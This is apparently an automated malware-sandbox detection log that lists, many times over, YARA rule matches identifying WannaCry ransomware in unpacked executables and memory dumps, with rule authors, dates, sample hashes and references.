Source: 19.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 19.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 19.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 6.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 6.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
Source: 6.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 6.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 6.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE, Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 6.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE, Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 6.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE, Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 9.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE, Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 9.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE, Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 9.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE, Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 9.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE, Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 9.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE, Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 9.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE, Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 4.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 4.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
Source: 4.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 4.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 4.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 4.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
Source: 4.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 4.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 4.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE, Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 4.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE, Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 4.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE, Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 4.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPE, Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 4.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPE, Matched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
Source: 4.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPE, Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 4.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPE, Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 4.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPE, Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 4.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPE, Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 4.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPE, Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 4.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE, Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 4.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE, Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 4.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE, Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 9.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE, Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 9.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE, Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 9.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE, Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 6.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE, Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 6.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE, Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 6.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE, Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 6.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 6.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
Source: 6.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 6.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 6.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPE, Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 6.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPE, Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 6.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPE, Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 4.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 4.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
Source: 4.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 4.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 6.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPE, Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 6.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPE, Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 6.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPE, Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 9.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 9.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
Source: 9.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 9.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
Source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 6.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPE, Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 6.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPE, Matched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
Source: 6.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPE, Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 6.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPE, Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 4.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPE, Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 4.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPE, Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 4.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPE, Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 6.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPE, Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 6.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPE, Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 6.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPE, Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 6.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE, Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 6.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE, Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 6.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE, Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 4.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPE, Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 4.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPE, Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 4.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPE, Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 6.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 6.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
Source: 6.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 6.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 6.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 6.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
Source: 6.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 6.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 00000004.00000000.381614610.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY, Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 00000009.00000002.486575854.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY, Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 00000006.00000002.471882688.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY, Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmp, type: MEMORY, Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 00000004.00000000.383003497.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY, Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 00000013.00000000.463303050.000000000040E000.00000008.00000001.01000000.00000005.sdmp, type: MEMORY, Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 00000009.00000000.396301371.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORY, Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
